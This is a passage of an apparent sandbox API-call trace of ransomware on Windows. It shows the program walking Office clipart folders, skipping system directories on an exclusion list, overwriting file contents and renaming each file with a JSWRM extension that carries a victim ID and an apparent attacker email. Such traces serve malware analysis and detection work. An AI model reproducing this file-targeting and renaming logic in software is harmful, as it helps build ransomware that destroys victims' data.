lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0087.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0087.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0087.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0087.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0087.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.407] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198025.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198025.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0087.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0087.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0087.408] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebae9de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebae9de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebae9de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd6b4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0198102.WMF", cAlternateFileName="")) returned 1 [0087.408] lstrcmpiW (lpString1="J0198102.WMF", lpString2=".") returned 1 [0087.408] lstrcmpiW (lpString1="J0198102.WMF", lpString2="..") returned 1 [0087.408] lstrcmpiW (lpString1="J0198102.WMF", lpString2="...") returned 1 [0087.408] lstrcmpiW (lpString1="J0198102.WMF", lpString2="windows") returned -1 [0087.408] lstrcmpiW (lpString1="J0198102.WMF", lpString2="recovery") returned -1 [0087.408] lstrcmpiW (lpString1="J0198102.WMF", lpString2="perflogs") returned -1 [0087.408] lstrcmpiW (lpString1="J0198102.WMF", lpString2="documents and settings") returned 1 [0087.408] lstrcmpiW (lpString1="J0198102.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.408] lstrcmpiW (lpString1="J0198102.WMF", lpString2="system volume information") returned -1 [0087.408] lstrcmpiW (lpString1="J0198102.WMF", lpString2="msocache") returned -1 [0087.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0087.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198102.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198102.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198102.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0087.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0087.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198102.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198102.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198102.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0087.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0087.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0087.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0087.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198102.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.410] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=54964) returned 1 [0087.410] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6b0) returned 0x24d210 [0087.411] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xd6b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xd6b0, lpOverlapped=0x0) returned 1 [0087.416] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.416] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xd6b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xd6b0, lpOverlapped=0x0) returned 1 [0087.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.417] CloseHandle (hObject=0x314) returned 1 [0087.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0087.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0087.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0087.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0087.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0087.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0087.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.418] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198102.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198102.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0087.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0087.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0087.418] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebae9de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebae9de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebae9de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa520, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0198113.WMF", cAlternateFileName="")) returned 1 [0087.418] lstrcmpiW (lpString1="J0198113.WMF", lpString2=".") returned 1 [0087.418] lstrcmpiW (lpString1="J0198113.WMF", lpString2="..") returned 1 [0087.419] lstrcmpiW (lpString1="J0198113.WMF", lpString2="...") returned 1 [0087.419] lstrcmpiW (lpString1="J0198113.WMF", lpString2="windows") returned -1 [0087.419] lstrcmpiW (lpString1="J0198113.WMF", lpString2="recovery") returned -1 [0087.419] lstrcmpiW (lpString1="J0198113.WMF", lpString2="perflogs") returned -1 [0087.419] lstrcmpiW (lpString1="J0198113.WMF", lpString2="documents and settings") returned 1 [0087.419] lstrcmpiW (lpString1="J0198113.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.419] lstrcmpiW (lpString1="J0198113.WMF", lpString2="system volume information") returned -1 [0087.419] lstrcmpiW (lpString1="J0198113.WMF", lpString2="msocache") returned -1 [0087.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0087.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198113.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198113.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198113.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0087.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0087.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198113.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198113.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198113.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0087.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0087.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0087.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0087.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198113.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.469] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42272) returned 1 [0087.469] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa520) returned 0x24d210 [0087.470] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa520, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa520, lpOverlapped=0x0) returned 1 [0087.475] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.475] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa520, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa520, lpOverlapped=0x0) returned 1 [0087.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.476] CloseHandle (hObject=0x314) returned 1 [0087.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0087.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0087.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0087.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0087.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0087.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0087.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.477] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198113.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198113.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0087.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0087.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0087.478] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebae9de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebae9de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebae9de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa3b2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0198226.WMF", cAlternateFileName="")) returned 1 [0087.478] lstrcmpiW (lpString1="J0198226.WMF", lpString2=".") returned 1 [0087.478] lstrcmpiW (lpString1="J0198226.WMF", lpString2="..") returned 1 [0087.478] lstrcmpiW (lpString1="J0198226.WMF", lpString2="...") returned 1 [0087.478] lstrcmpiW (lpString1="J0198226.WMF", lpString2="windows") returned -1 [0087.478] lstrcmpiW (lpString1="J0198226.WMF", lpString2="recovery") returned -1 [0087.478] lstrcmpiW (lpString1="J0198226.WMF", lpString2="perflogs") returned -1 [0087.478] lstrcmpiW (lpString1="J0198226.WMF", lpString2="documents and settings") returned 1 [0087.478] lstrcmpiW (lpString1="J0198226.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.478] lstrcmpiW (lpString1="J0198226.WMF", lpString2="system volume information") returned -1 [0087.478] lstrcmpiW (lpString1="J0198226.WMF", lpString2="msocache") returned -1 [0087.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0087.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198226.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198226.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198226.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0087.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0087.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198226.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198226.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198226.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0087.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0087.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0087.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0087.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198226.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.479] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=41906) returned 1 [0087.479] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa3b0) returned 0x24d210 [0087.480] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa3b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa3b0, lpOverlapped=0x0) returned 1 [0087.484] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.484] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa3b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa3b0, lpOverlapped=0x0) returned 1 [0087.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.485] CloseHandle (hObject=0x314) returned 1 [0087.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0087.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0087.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0087.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0087.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0087.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0087.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.486] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198226.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198226.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0087.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0087.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0087.487] FindNextFileW (in: 